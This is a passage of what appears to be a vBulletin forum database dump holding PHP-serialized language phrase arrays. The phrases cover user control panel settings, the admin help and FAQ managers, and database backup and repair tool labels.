be seeing this message. Please contact the administrator with your username, and your account will be changed.\";s:27:\"manage_your_friend_requests\";s:27:\"Manage your Friend Requests\";s:31:\"may_allow_users_tdownload_vcard\";s:204:\"You may choose to allow other users to download a vCard containing your email address and username. \r\n \r\n If you want to keep your email address private, do not allow vCard downloads.\";s:31:\"may_be_identified_member_groups\";s:67:\"You may choose to be identified as a member of the following groups\";s:25:\"may_enter_identity_for_im\";s:151:\"You may enter your registered identity for the instant messaging networks if you would like other visitors to be able to contact you using that medium.\";s:31:\"may_select_predefined_as_avatar\";s:77:\"You may select one of the following pre-defined images to use as your avatar:\";s:32:\"may_upload_custom_image_controls\";s:60:\"You may upload a new custom image using the controls below. \";s:26:\"member_of_following_groups\";s:40:\"You are a member of the following groups\";s:20:\"members_of_usergroup\";s:20:\"Members of Usergroup\";s:24:\"message_editor_interface\";s:24:\"Message Editor Interface\";s:22:\"messaging_notification\";s:28:\"Messaging & Notification\";s:15:\"mini_statistics\";s:15:\"Mini Statistics\";s:27:\"moderated_discussion_prefix\";s:10:\"Moderated:\";s:21:\"moderated_discussions\";s:21:\"Moderated Discussions\";s:15:\"moderated_items\";s:15:\"Moderated Items\";s:18:\"moderated_messages\";s:18:\"Moderated Messages\";s:26:\"moderated_picture_comments\";s:26:\"Moderated Picture Comments\";s:18:\"moderated_pictures\";s:18:\"Moderated Pictures\";s:15:\"moderated_posts\";s:15:\"Moderated Posts\";s:34:\"moderated_social_group_discussions\";s:34:\"Moderated Social Group Discussions\";s:31:\"moderated_social_group_messages\";s:31:\"Moderated Social Group Messages\";s:17:\"moderated_threads\";s:17:\"Moderated Threads\";s:25:\"moderated_visitor_message\";s:25:\"Moderated Visitor Message\";s:26:\"moderated_visitor_messages\";s:26:\"Moderated Visitor Messages\";s:16:\"moderated_within\";s:16:\"Moderated within\";s:10:\"moderation\";s:10:\"Moderation\";s:14:\"more_text_here\";s:14:\"More Text Here\";s:19:\"most_recent_message\";s:19:\"Most Recent Message\";s:21:\"most_recent_user_note\";s:21:\"Most Recent User Note\";s:20:\"msn_messenger_handle\";s:20:\"MSN Messenger Handle\";s:17:\"new_email_address\";s:17:\"New Email Address\";s:9:\"new_items\";s:9:\"New Items\";s:12:\"new_password\";s:12:\"New Password\";s:20:\"new_picture_comments\";s:20:\"New Picture Comments\";s:12:\"new_pictures\";s:12:\"New Pictures\";s:20:\"new_private_messages\";s:20:\"New Private Messages\";s:28:\"new_social_group_discussions\";s:28:\"New Social Group Discussions\";s:25:\"new_social_group_messages\";s:25:\"New Social Group Messages\";s:26:\"new_subscribed_discussions\";s:26:\"New Subscribed Discussions\";s:22:\"new_subscribed_threads\";s:22:\"New Subscribed Threads\";s:20:\"new_visitor_messages\";s:20:\"New Visitor Messages\";s:12:\"newest_first\";s:12:\"Newest First\";s:19:\"no_avatar_specified\";s:19:\"No Avatar Specified\";s:17:\"no_pictures_found\";s:17:\"No Pictures Found\";s:14:\"no_posts_found\";s:15:\"No posts found.\";s:18:\"no_profile_picture\";s:28:\"No Profile Picture Specified\";s:36:\"no_subscribed_discussions_to_display\";s:57:\"There are no subscribed discussions for this time period.\";s:32:\"no_subscribed_threads_to_display\";s:79:\"There are no subscribed threads to display in this folder for this time period.\";s:35:\"no_visitor_messages_between_members\";s:52:\"There are no visitor messages between these members.\";s:30:\"note_have_custom_avatar_delete\";s:71:\"Note: if you have a custom avatar selecting this option will delete it.\";s:19:\"note_maximum_size_x\";s:52:\"Note: The maximum size of your custom image is %1$s.\";s:26:\"note_maximum_size_x_y_or_z\";s:98:\"Note: The maximum size of your custom image is %1$s by %2$s pixels or %3$s (whichever is smaller).\";s:28:\"note_maximum_size_x_y_pixels\";s:67:\"Note: The maximum size of your custom image is %1$s by %2$s pixels.\";s:12:\"oldest_first\";s:12:\"Oldest First\";s:23:\"option_to_hide_elements\";s:177:\"You have the option to show or hide various elements of messages, which may be of use to users on slow internet connections, or who want to remove extraneous clutter from posts.\";s:25:\"optional_information_will\";s:79:\"Optional Information - All information will be viewable by other forum members.\";s:25:\"or_enter_your_choice_here\";s:25:\"Or enter your choice here\";s:20:\"parent_email_address\";s:20:\"Parent Email Address\";s:21:\"parent_guardian_email\";s:23:\"Parent / Guardian Email\";s:33:\"parts_use_different_start_of_week\";s:185:\"Different parts of the world traditionally use a different day as the start of the week. Select the appropriate day for your region here, in order to have the calendar appear correctly.\";s:23:\"pending_friend_requests\";s:23:\"Pending Friend Requests\";s:20:\"pending_friends_list\";s:20:\"Pending Friends List\";s:24:\"pending_picture_comments\";s:24:\"Pending Picture Comments\";s:16:\"picture_comments\";s:16:\"Picture Comments\";s:14:\"picture_x_by_y\";s:59:\"Picture: %2$s by %4$s \";s:8:\"pictures\";s:8:\"Pictures\";s:21:\"pm_from_contacts_only\";s:58:\"Receive Private Messages only from Contacts and Moderators\";s:6:\"points\";s:6:\"Points\";s:16:\"post_a_user_note\";s:16:\"Post a User Note\";s:28:\"post_a_visitor_message_for_x\";s:31:\"Post a visitor message for %1$s\";s:10:\"post_count\";s:10:\"Post Count\";s:12:\"post_message\";s:12:\"Post Message\";s:24:\"post_new_visitor_message\";s:24:\"Post New Visitor Message\";s:15:\"posting_message\";s:15:\"Posting Message\";s:27:\"posting_message_please_wait\";s:29:\"Posting Message - Please Wait\";s:13:\"posts_per_day\";s:13:\"Posts Per Day\";s:22:\"posts_to_show_per_page\";s:32:\"Number of Posts to Show Per Page\";s:12:\"predefined_x\";s:16:\"Pre-defined %1$s\";s:17:\"preview_signature\";s:17:\"Preview Signature\";s:13:\"primary_users\";s:13:\"Primary Users\";s:26:\"print_new_permissions_form\";s:67:\"To print out a new permissions form, please click the button below.\";s:7:\"privacy\";s:7:\"Privacy\";s:17:\"private_messaging\";s:17:\"Private Messaging\";s:7:\"profile\";s:7:\"Profile\";s:18:\"profile_infraction\";s:18:\"Profile Infraction\";s:15:\"profile_picture\";s:15:\"Profile Picture\";s:20:\"profile_picture_desc\";s:94:\"Profile pictures are small pictures of yourself, which are displayed within your user profile.\";s:15:\"profile_privacy\";s:15:\"Profile Privacy\";s:13:\"profile_style\";s:13:\"Profile Style\";s:15:\"profile_warning\";s:15:\"Profile Warning\";s:9:\"profile_x\";s:32:\"Profile: %2$s \";s:17:\"public_usergroups\";s:17:\"Public Usergroups\";s:18:\"reason_for_request\";s:41:\"Please state your reason for this request\";s:20:\"receive_admin_emails\";s:20:\"Receive Admin Emails\";s:13:\"receive_email\";s:13:\"Receive Email\";s:36:\"receive_email_for_friendship_request\";s:99:\"If you do not want to receive an email for each request of friendship, you may disable this option.\";s:39:\"receive_email_from_bulletin_board_staff\";s:33:\"Receive Email from Administrators\";s:32:\"receive_email_from_other_members\";s:32:\"Receive Email from Other Members\";s:29:\"receive_email_notification_pm\";s:50:\"Receive Email Notification of New Private Messages\";s:28:\"receive_friendship_req_email\";s:32:\"Receive Friendship Request Email\";s:24:\"receive_private_messages\";s:24:\"Receive Private Messages\";s:19:\"receive_user_emails\";s:30:\"Receive Email from Other Users\";s:15:\"recent_messages\";s:15:\"Recent Messages\";s:15:\"recent_visitors\";s:15:\"Recent Visitors\";s:9:\"referrals\";s:9:\"Referrals\";s:8:\"referrer\";s:8:\"Referrer\";s:18:\"registered_members\";s:18:\"Registered Members\";s:33:\"registration_required_information\";s:60:\"Registration Required Information - All fields are required.\";s:31:\"reject_selected_friend_requests\";s:31:\"Reject selected friend requests\";s:20:\"remove_from_contacts\";s:20:\"Remove from Contacts\";s:24:\"remove_from_friends_list\";s:24:\"Remove from Friends List\";s:23:\"remove_from_ignore_list\";s:23:\"Remove from Ignore List\";s:28:\"remove_from_userlist_confirm\";s:46:\"Are you sure you want to remove these user(s)?\";s:21:\"remove_selected_users\";s:23:\"Remove Selected User(s)\";s:30:\"remove_x_from_contacts_confirm\";s:56:\"Are you sure you want to remove %1$s from your contacts?\";s:32:\"remove_x_from_friendlist_confirm\";s:59:\"Are you sure you want to remove %1$s from your friend list?\";s:25:\"remove_x_from_ignore_list\";s:33:\"Remove %1$s from Your Ignore List\";s:32:\"remove_x_from_ignorelist_confirm\";s:59:\"Are you sure you want to remove %1$s from your ignore list?\";s:29:\"remove_x_from_your_ignorelist\";s:33:\"Remove %1$s from your Ignore List\";s:6:\"report\";s:6:\"Report\";s:26:\"report_bad_visitor_message\";s:22:\"Report Visitor Message\";s:34:\"request_activation_code_sent_email\";s:145:\"To request for your activation code to be sent to you by email, please enter your registered email address in the box below then submit the form.\";s:18:\"request_friendship\";s:18:\"Request Friendship\";s:21:\"request_to_join_group\";s:21:\"Request to Join Group\";s:39:\"request_to_join_x__moderated_by_leaders\";s:79:\"Your request to join group \'%1$s\' will be moderated by one of the group leaders\";s:24:\"requested_to_join_x_at_y\";s:71:\"You requested to join this group %1$s at %2$s \";s:27:\"requests_approved_by_leader\";s:52:\"Requests to join must be approved by a group leader.\";s:16:\"reset_to_default\";s:16:\"Reset to Default\";s:7:\"reverse\";s:7:\"Reverse\";s:8:\"reversed\";s:8:\"Reversed\";s:9:\"save_list\";s:9:\"Save List\";s:23:\"save_pm_copy_by_default\";s:97:\"When sending private messages the forum can make a copy of the message in your Sent Items folder.\";s:20:\"save_pm_copy_default\";s:82:\"Save a copy of sent messages in my Sent Items folder by default\";s:14:\"save_signature\";s:14:\"Save Signature\";s:14:\"search_members\";s:14:\"Search Members\";s:10:\"select_all\";s:27:\"Select All\";s:20:\"select_deleted_posts\";s:37:\"Select Deleted Posts\";s:23:\"select_unapproved_posts\";s:40:\"Select Unapproved Posts\";s:21:\"send_aim_message_to_x\";s:27:\"Send an AIM message to %1$s\";s:21:\"send_icq_message_to_x\";s:27:\"Send an ICQ message to %1$s\";s:31:\"send_instant_message_to_x_using\";s:40:\"Send an Instant Message to %1$s Using...\";s:12:\"send_message\";s:12:\"Send Message\";s:17:\"send_message_to_x\";s:22:\"Send a Message to %1$s\";s:21:\"send_msn_message_to_x\";s:27:\"Send an MSN message to %1$s\";s:58:\"send_notification_email_when_a_private_message_is_received\";s:58:\"Send Notification Email When a Private Message is Received\";s:12:\"send_request\";s:12:\"Send Request\";s:23:\"send_skype_message_to_x\";s:28:\"Send a Skype message to %1$s\";s:23:\"send_yahoo_message_to_x\";s:29:\"Send a Yahoo! message to %1$s\";s:31:\"server_failed_respond_try_again\";s:55:\"The server failed to respond in time. Please try again.\";s:20:\"settings_and_options\";s:22:\"Settings & Options\";s:15:\"show_all_albums\";s:15:\"Show All Albums\";s:16:\"show_all_friends\";s:16:\"Show All Friends\";s:19:\"show_all_statistics\";s:19:\"Show All Statistics\";s:16:\"show_all_threads\";s:16:\"Show all threads\";s:12:\"show_avatars\";s:12:\"Show Avatars\";s:28:\"show_enhanced_editor_toolbar\";s:38:\"Show Enhanced (WYSIWYG) Editor Toolbar\";s:11:\"show_images\";s:11:\"Show Images\";s:13:\"show_pm_popup\";s:44:\"Show New Private Message Notification Pop-up\";s:15:\"show_signatures\";s:15:\"Show Signatures\";s:28:\"show_standard_editor_toolbar\";s:28:\"Show Standard Editor Toolbar\";s:24:\"show_user_customizations\";s:24:\"Show User Customizations\";s:21:\"show_x_posts_per_page\";s:24:\"Show %1$s Posts Per Page\";s:26:\"show_your_reputation_level\";s:26:\"Show Your Reputation Level\";s:27:\"showing_friends_x_to_y_of_z\";s:36:\"Showing Friends %1$s to %2$s of %3$s\";s:23:\"showing_pcs_x_to_y_of_z\";s:120:\"Showing Picture Comments %1$s to %2$s of %3$s \";s:23:\"showing_vms_x_to_y_of_z\";s:120:\"Showing Visitor Messages %1$s to %2$s of %3$s \";s:22:\"showing_x_of_y_friends\";s:30:\"Showing %1$s of %2$s Friend(s)\";s:17:\"signature_picture\";s:17:\"Signature Picture\";s:10:\"skype_name\";s:10:\"Skype Name\";s:15:\"small_text_here\";s:15:\"Small Text Here\";s:32:\"standard_editor_extra_formatting\";s:43:\"Standard Editor - Extra formatting controls\";s:17:\"start_of_the_week\";s:17:\"Start of the Week\";s:10:\"statistics\";s:10:\"Statistics\";s:17:\"subscribed_forums\";s:17:\"Subscribed Forums\";s:24:\"subscribed_social_groups\";s:24:\"Subscribed Social Groups\";s:18:\"switch_skin_select\";s:240:\"There is more than one skin in which you can view the forums. If you would like to switch to a different skin, select it from this list. \r\n \r\n Please note that some forums here may override your skin choice temporarily.\";s:9:\"text_here\";s:9:\"Text Here\";s:35:\"the_following_groups_need_attention\";s:35:\"The following groups need attention\";s:25:\"this_message_is_moderated\";s:25:\"This Message is Moderated\";s:9:\"this_page\";s:9:\"This Page\";s:22:\"this_page_has_x_visits\";s:46:\"This page has had %1$s visits\";s:19:\"thread_display_mode\";s:19:\"Thread Display Mode\";s:22:\"thread_display_options\";s:22:\"Thread Display Options\";s:8:\"threaded\";s:8:\"Threaded\";s:31:\"tick_box_to_make_friends_with_x\";s:40:\"Check this box to make friends with %1$s\";s:31:\"time_auto_corrected_to_location\";s:187:\"All timestamps displayed on the forums can be automatically corrected to show the correct time for your location in the world. Simply select the appropriate time zone from the list below.\";s:30:\"time_period_to_display_threads\";s:118:\"You may specify a time period from which to display threads. Threads older than the age you specify will not be shown.\";s:9:\"time_zone\";s:9:\"Time Zone\";s:31:\"title_appears_beneath_your_name\";s:157:\"This is the title that appears beneath your name on your posts. Check the \'Reset\' box if you wish to use the default title for your usergroup and post count.\";s:23:\"to_delete_a_folder_subs\";s:76:\"To delete a folder, remove the folder\'s name from the list.\";s:12:\"total_albums\";s:12:\"Total Albums\";s:14:\"total_messages\";s:14:\"Total Messages\";s:14:\"total_pictures\";s:14:\"Total Pictures\";s:11:\"total_posts\";s:11:\"Total Posts\";s:16:\"total_user_notes\";s:16:\"Total User Notes\";s:11:\"transparent\";s:11:\"Transparent\";s:19:\"twitter_integration\";s:173:\"Setting up integration with Twitter through this forum will turn on any \"Tweet This\" feature on this site. Setup integration by clicking here .\";s:10:\"twitter_vb\";s:9:\"vBTwitter\";s:18:\"unapprove_messages\";s:18:\"Unapprove Messages\";s:17:\"undelete_messages\";s:17:\"Undelete Messages\";s:18:\"unregistered_users\";s:18:\"Unregistered Users\";s:20:\"update_display_group\";s:20:\"Update Display Group\";s:26:\"upload_image_from_computer\";s:31:\"Upload Image From Your Computer\";s:30:\"upload_sig_image_from_computer\";s:60:\"Upload a image to be used as a signature from your computer.\";s:24:\"upload_signature_picture\";s:24:\"Upload Signature Picture\";s:27:\"usage_vm_only_from_contacts\";s:121:\"You may limit the usage of your visitor messages to just moderators and your contacts .\";s:27:\"use_can_make_customizations\";s:150:\"Other users can make customizations to some of their pages, such as their profile page. With this option you can choose to hide these customizations.\";s:17:\"use_custom_avatar\";s:17:\"Use Custom Avatar\";s:17:\"use_forum_default\";s:17:\"Use Forum Default\";s:18:\"use_invisible_mode\";s:18:\"Use Invisible Mode\";s:19:\"use_profile_picture\";s:19:\"Use Profile Picture\";s:30:\"use_set_posts_before_splitting\";s:112:\"Use this option to set the number of posts to show in a thread before splitting the display into multiple pages.\";s:26:\"user_created_social_groups\";s:13:\"Social Groups\";s:19:\"user_customizations\";s:19:\"User Customizations\";s:10:\"user_group\";s:10:\"User Group\";s:10:\"user_lists\";s:10:\"User Lists\";s:10:\"user_notes\";s:10:\"User Notes\";s:18:\"user_notifications\";s:18:\"User Notifications\";s:10:\"user_title\";s:10:\"User Title\";s:20:\"usercss_alternating1\";s:21:\"Primary Content Areas\";s:20:\"usercss_alternating2\";s:23:\"Secondary Content Areas\";s:24:\"usercss_background_color\";s:16:\"Background Color\";s:24:\"usercss_background_image\";s:16:\"Background Image\";s:25:\"usercss_background_repeat\";s:6:\"Repeat\";s:20:\"usercss_border_color\";s:12:\"Border Color\";s:20:\"usercss_border_style\";s:12:\"Border Style\";s:20:\"usercss_border_width\";s:12:\"Border Width\";s:26:\"usercss_borderstyle_dashed\";s:6:\"Dashed\";s:26:\"usercss_borderstyle_dotted\";s:6:\"Dotted\";s:26:\"usercss_borderstyle_double\";s:6:\"Double\";s:26:\"usercss_borderstyle_groove\";s:6:\"Groove\";s:26:\"usercss_borderstyle_hidden\";s:6:\"Hidden\";s:25:\"usercss_borderstyle_inset\";s:5:\"Inset\";s:24:\"usercss_borderstyle_none\";s:4:\"None\";s:26:\"usercss_borderstyle_outset\";s:6:\"Outset\";s:25:\"usercss_borderstyle_ridge\";s:5:\"Ridge\";s:25:\"usercss_borderstyle_solid\";s:5:\"Solid\";s:25:\"usercss_borderwidth_large\";s:5:\"Large\";s:26:\"usercss_borderwidth_medium\";s:6:\"Medium\";s:25:\"usercss_borderwidth_small\";s:5:\"Small\";s:13:\"usercss_color\";s:10:\"Text Color\";s:15:\"usercss_example\";s:31:\"Style Customization Example Key\";s:18:\"usercss_font_arial\";s:5:\"Arial\";s:26:\"usercss_font_comic_sans_ms\";s:13:\"Comic Sans MS\";s:24:\"usercss_font_courier_new\";s:11:\"Courier New\";s:19:\"usercss_font_family\";s:11:\"Font Family\";s:19:\"usercss_font_geneva\";s:6:\"Geneva\";s:20:\"usercss_font_georgia\";s:7:\"Georgia\";s:17:\"usercss_font_size\";s:9:\"Font Size\";s:19:\"usercss_font_tahoma\";s:6:\"Tahoma\";s:28:\"usercss_font_times_new_roman\";s:15:\"Times New Roman\";s:25:\"usercss_font_trebuchet_ms\";s:12:\"Trebuchet MS\";s:20:\"usercss_font_verdana\";s:7:\"Verdana\";s:22:\"usercss_fontsize_large\";s:5:\"Large\";s:23:\"usercss_fontsize_medium\";s:6:\"Medium\";s:22:\"usercss_fontsize_small\";s:5:\"Small\";s:14:\"usercss_inputs\";s:8:\"Controls\";s:19:\"usercss_inputs_desc\";s:64:\"These include text boxes, buttons, pop-up menus, checkboxes etc.\";s:17:\"usercss_linkcolor\";s:15:\"Hyperlink Color\";s:12:\"usercss_main\";s:4:\"Main\";s:18:\"usercss_normaltext\";s:11:\"Normal Text\";s:15:\"usercss_padding\";s:7:\"Padding\";s:26:\"usercss_padding_gargantuan\";s:10:\"Gargantuan\";s:20:\"usercss_padding_huge\";s:4:\"Huge\";s:21:\"usercss_padding_large\";s:5:\"Large\";s:22:\"usercss_padding_medium\";s:6:\"Medium\";s:20:\"usercss_padding_none\";s:4:\"None\";s:21:\"usercss_padding_small\";s:5:\"Small\";s:20:\"usercss_padding_tiny\";s:4:\"Tiny\";s:13:\"usercss_panel\";s:5:\"Panel\";s:21:\"usercss_panelsurround\";s:14:\"Panel Surround\";s:24:\"usercss_repeat_no_repeat\";s:4:\"None\";s:21:\"usercss_repeat_repeat\";s:4:\"Both\";s:23:\"usercss_repeat_repeat_x\";s:10:\"Horizontal\";s:23:\"usercss_repeat_repeat_y\";s:8:\"Vertical\";s:18:\"usercss_shadecolor\";s:17:\"Shaded Text Color\";s:17:\"usercss_smalltext\";s:10:\"Small Text\";s:19:\"usercss_tableborder\";s:13:\"Block Borders\";s:24:\"usercss_tableborder_desc\";s:106:\"If you customize this, you should explicitly set background colors for both major and minor block headers.\";s:19:\"usercss_tablefooter\";s:13:\"Block Footers\";s:24:\"usercss_tablefooter_desc\";s:97:\"Some but not all blocks may have an additional bar at the bottom containing buttons etc.\";s:19:\"usercss_tableheader\";s:19:\"Minor Block Headers\";s:18:\"usercss_tabletitle\";s:19:\"Major Block Headers\";s:23:\"userlist_filter_tooltip\";s:103:\"Enter text here to filter search results below to only show users whose names contain your search text.\";s:5:\"vcard\";s:5:\"vCard\";s:31:\"view_all_subscribed_discussions\";s:31:\"View all Subscribed Discussions\";s:32:\"view_all_unread_private_messages\";s:32:\"View All Unread Private Messages\";s:31:\"view_comments_awaiting_approval\";s:31:\"View Comments Awaiting Approval\";s:26:\"view_complete_members_list\";s:65:\"To view the complete members list, click here .\";s:17:\"view_conversation\";s:17:\"View Conversation\";s:33:\"view_conversation_between_x_and_y\";s:39:\"View Conversation Between %1$s and %2$s\";s:22:\"view_group_invitations\";s:22:\"View Group Invitations\";s:19:\"view_group_requests\";s:33:\"View requests to join your groups\";s:13:\"view_requests\";s:13:\"View Requests\";s:20:\"view_unread_comments\";s:20:\"View Unread Comments\";s:18:\"view_your_about_me\";s:45:\"View your \"About Me\" as seen by everyone else\";s:29:\"view_your_conversation_with_x\";s:32:\"View Your Conversation with %1$s\";s:21:\"visible_post_elements\";s:21:\"Visible Post Elements\";s:17:\"visit_xs_homepage\";s:22:\"Visit %1$s\'s homepage!\";s:15:\"visitor_message\";s:15:\"Visitor Message\";s:22:\"visitor_messages_for_x\";s:25:\"Visitor Messages for %1$s\";s:17:\"visitor_messaging\";s:17:\"Visitor Messaging\";s:6:\"weekly\";s:6:\"Weekly\";s:12:\"x_and_y_more\";s:18:\"%1$s and %2$s more\";s:9:\"x_avatars\";s:12:\"%1$s avatars\";s:24:\"x_has_invalid_properties\";s:55:\"%2$s has invalid properties\";s:21:\"x_has_no_contact_info\";s:32:\"%1$s has no contact information.\";s:25:\"x_has_no_visitor_messages\";s:43:\"%1$s has not received any visitor messages.\";s:28:\"x_has_not_created_any_albums\";s:31:\"%1$s has not created any Albums\";s:30:\"x_has_not_made_any_friends_yet\";s:33:\"%1$s has not made any friends yet\";s:38:\"x_is_not_a_member_of_any_public_groups\";s:41:\"%1$s is not a member of any public groups\";s:20:\"x_moderated_pictures\";s:25:\"%1$s Moderated Picture(s)\";s:14:\"x_points_total\";s:19:\"%1$s point(s) total\";s:15:\"x_posts_per_day\";s:18:\"%1$s posts per day\";s:9:\"xs_avatar\";s:13:\"%1$s\'s Avatar\";s:10:\"xs_picture\";s:22:\"%1$s\'s Profile Picture\";s:10:\"xs_profile\";s:14:\"%1$s\'s Profile\";s:22:\"yahoo_messenger_handle\";s:23:\"Yahoo! Messenger Handle\";s:13:\"year_optional\";s:15:\"Year (Optional)\";s:23:\"you_have_no_attachments\";s:24:\"You have no attachments.\";s:31:\"you_have_not_created_any_albums\";s:31:\"You have not created any albums\";s:39:\"you_have_pending_friend_requests_from_x\";s:43:\"You have pending friend requests from %1$s.\";s:50:\"you_have_pending_friend_requests_from_x_and_y_more\";s:59:\"You have pending friend requests from %1$s and %2$s others.\";s:45:\"you_have_x_picture_comments_awaiting_approval\";s:51:\"You have %1$s picture comment(s) awaiting approval.\";s:34:\"you_have_x_unread_picture_comments\";s:40:\"You have %1$s unread picture comment(s).\";s:27:\"you_leader_following_groups\";s:40:\"You are a leader of the following groups\";s:36:\"you_lost_activation_code_or_username\";s:149:\"If you have lost your activation code or you have forgotten your username,click here to have the codes emailed to you again.\";s:25:\"you_not_member_any_groups\";s:34:\"You are not a member of any groups\";s:13:\"your_contacts\";s:13:\"Your Contacts\";s:18:\"your_control_panel\";s:18:\"Your Control Panel\";s:19:\"your_current_avatar\";s:19:\"Your Current Avatar\";s:28:\"your_current_profile_picture\";s:28:\"Your Current Profile Picture\";s:30:\"your_current_signature_picture\";s:30:\"Your Current Signature Picture\";s:26:\"your_current_user_title_is\";s:26:\"Your current user title is\";s:18:\"your_date_of_birth\";s:194:\"Your date of birth and age are displayed in several places on the forum. Only the administrator will have access to your date of birth should you choose to hide it via the privacy option below.\";s:12:\"your_friends\";s:12:\"Your Friends\";s:26:\"your_friends_list_is_empty\";s:26:\"Your friends list is empty\";s:20:\"your_profile_picture\";s:20:\"Your Profile Picture\";s:14:\"your_signature\";s:14:\"Your Signature\";}', 'a:26:{s:18:\"action_leave_blank\";s:102:\"Action:- leave blank to make a general topic - use commas to separate multiple actions \";s:22:\"action_specific_topics\";s:22:\"Action Specific Topics\";s:18:\"add_child_faq_item\";s:18:\"Add Child FAQ Item\";s:16:\"add_new_faq_item\";s:16:\"Add New FAQ Item\";s:13:\"add_new_topic\";s:13:\"Add New Topic\";s:10:\"admin_help\";s:10:\"Admin Help\";s:18:\"admin_help_manager\";s:18:\"Admin Help Manager\";s:11:\"all_scripts\";s:11:\"All Scripts\";s:38:\"are_you_sure_want_to_delete_faq_item_x\";s:162:\"Are you sure you want to delete the FAQ item called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:35:\"are_you_sure_want_to_delete_topic_x\";s:159:\"Are you sure you want to delete the topic called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:25:\"download_upload_adminhelp\";s:28:\"Download / Upload Admin Help\";s:11:\"edit_topics\";s:11:\"Edit Topics\";s:21:\"faq_link_name_changed\";s:21:\"FAQ Link Name Changed\";s:11:\"faq_manager\";s:11:\"FAQ Manager\";s:14:\"general_topics\";s:14:\"General Topics\";s:26:\"import_admin_help_xml_file\";s:26:\"Import Admin Help XML File\";s:32:\"imported_admin_help_successfully\";s:32:\"Imported Admin Help Successfully\";s:20:\"importing_admin_help\";s:20:\"Importing Admin Help\";s:18:\"no_parent_faq_item\";s:18:\"No Parent FAQ Item\";s:15:\"parent_faq_item\";s:15:\"Parent FAQ Item\";s:22:\"quick_help_topic_links\";s:22:\"Quick Help Topic Links\";s:22:\"show_child_faq_entries\";s:22:\"Show Child FAQ Entries\";s:37:\"sorry_there_is_already_an_item_called\";s:38:\"Sorry, there is already an item called\";s:54:\"to_maintain_compatibility_with_the_system_name_changed\";s:260:\"To maintain compatibility with the system, your specified link name: %1$s
has been replaced with the following: %2$s
You may edit the replacement link name below.\";s:5:\"topic\";s:5:\"Topic\";s:13:\"topic_manager\";s:13:\"Topic Manager\";}', 'a:55:{s:16:\"add_column_names\";s:16:\"Add Column Names\";s:13:\"affected_rows\";s:27:\"Affected Rows: %1$s (%2$ss)\";s:26:\"all_unique_indexes_checked\";s:134:\"All unique indexes checked and corrected as necessary. Click the Proceed button to return to the main repair page.\";s:20:\"allow_vcard_download\";s:20:\"Allow vCard Download\";s:51:\"an_error_occured_while_attempting_to_run_your_query\";s:147:\"An error occurred while attempting to execute your query. The following information was returned.\r\n error number: %1$s\r\n error desc: %2$s\";s:10:\"auto_query\";s:160:\"Automatic QueryHelpful, predefined queries for mass updating the settings of users and posts. Once a query is executed it can not be reversed. \";s:39:\"backup_database_to_a_file_on_the_server\";s:39:\"Backup database to a file on the server\";s:19:\"backup_file_warning\";s:209:\"Warning : The file path specified here will save the backup within the web root, meaning that anybody can download it. We recommend that you specify a more secure location to store your backup.\";s:23:\"confirm_query_execution\";s:23:\"Confirm Query Execution\";s:26:\"convert_tables_from_x_to_y\";s:32:\"Convert Tables From %1$s to %2$s\";s:21:\"convert_x_from_y_to_z\";s:30:\"Convert %1$s From %2$s to %3$s\";s:21:\"creating_unique_index\";s:24:\"Creating unique index...\";s:35:\"csv_backup_of_single_database_table\";s:35:\"CSV backup of single database table\";s:11:\"data_length\";s:11:\"Data Length\";s:35:\"database_table_to_include_in_backup\";s:36:\"Database tables to include in backup\";s:27:\"deleted_duplicate_occurence\";s:28:\"Deleted duplicate occurrence\";s:15:\"display_avatars\";s:15:\"Display Avatars\";s:13:\"display_email\";s:13:\"Display Email\";s:14:\"display_images\";s:14:\"Display Images\";s:18:\"display_reputation\";s:18:\"Display Reputation\";s:18:\"display_signatures\";s:18:\"Display Signatures\";s:25:\"dropping_non_unique_index\";s:28:\"Dropping non-unique index...\";s:17:\"execute_sql_query\";s:17:\"Execute SQL Query\";s:18:\"fix_unique_indexes\";s:18:\"Fix Unique Indexes\";s:24:\"fix_unique_indexes_intro\";s:496:\" If for whatever reason the UNIQUE indexes in your database\r\n have been lost (usually this happens after importing an\r\n incomplete or corrupt SQL dump) you may find strange behavior,\r\n particularly when using the language and template systems. \r\n \r\n This system will attempt to correct the problem and rebuild your\r\n UNIQUE indexes. \r\n \r\n Please ensure that the mysql-schema.php file is present\r\n in the install folder on your web server before continuing.\";s:35:\"found_x_duplicate_record_occurences\";s:39:\"Found %1$s duplicate record occurrences\";s:12:\"index_length\";s:12:\"Index Length\";s:14:\"invisible_mode\";s:14:\"Invisible Mode\";s:11:\"isam_tables\";s:11:\"ISAM Tables\";s:12:\"manual_query\";s:114:\"Manual QueryOnly one query can be run at a time. Once a query is executed it can not be reversed \";s:12:\"newest_first\";s:12:\"Newest First\";s:12:\"oldest_first\";s:12:\"Oldest First\";s:15:\"optimize_tables\";s:15:\"Optimize Tables\";s:8:\"overhead\";s:8:\"Overhead\";s:31:\"path_and_file_to_save_backup_to\";s:131:\"Path and name of file to save backup to:Your web server must have access to write to this directory (usually chmod 0777) \";s:18:\"php_backup_warning\";s:163:\"Database backup via PHP is only recommended for those with small databases as timeouts may occur. Saving to the server or backup via command line is more reliable.\";s:5:\"query\";s:5:\"Query\";s:25:\"query_may_modify_database\";s:182:\"This query may modify data in your database. If this change is done in error, it is possible that you will not be able to recover from this change. Are you sure you wish to continue?\";s:15:\"quote_character\";s:15:\"Quote Character\";s:20:\"receive_admin_emails\";s:20:\"Receive Admin Emails\";s:24:\"receive_private_messages\";s:24:\"Receive Private Messages\";s:22:\"repair_optimize_tables\";s:24:\"Repair / Optimize Tables\";s:13:\"repair_tables\";s:13:\"Repair Tables\";s:33:\"replacing_unique_index_on_table_x\";s:36:\"Replacing unique index on table %1$s\";s:24:\"results_to_show_per_page\";s:24:\"Results to Show Per Page\";s:11:\"results_x_y\";s:21:\"Results: %1$s (%2$ss)\";s:58:\"send_notification_email_when_a_private_message_is_received\";s:58:\"Send Notification Email When a Private Message is Received\";s:19:\"separator_character\";s:19:\"Separator Character\";s:28:\"show_enhanced_editor_toolbar\";s:38:\"Show Enhanced (WYSIWYG) Editor Toolbar\";s:28:\"show_standard_editor_toolbar\";s:28:\"Show Standard Editor Toolbar\";s:10:\"table_name\";s:10:\"Table Name\";s:24:\"table_x_has_unique_index\";s:37:\"Table %1$s already has a unique index\";s:43:\"this_table_does_not_support_repair_optimize\";s:45:\"This Table Does Not Support Repair / Optimize\";s:19:\"thread_display_mode\";s:19:\"Thread Display Mode\";s:49:\"you_are_running_mysql_version_x_convert_to_myisam\";s:337:\"You are running MySQL version %1$s which supports a new table format called MyISAM 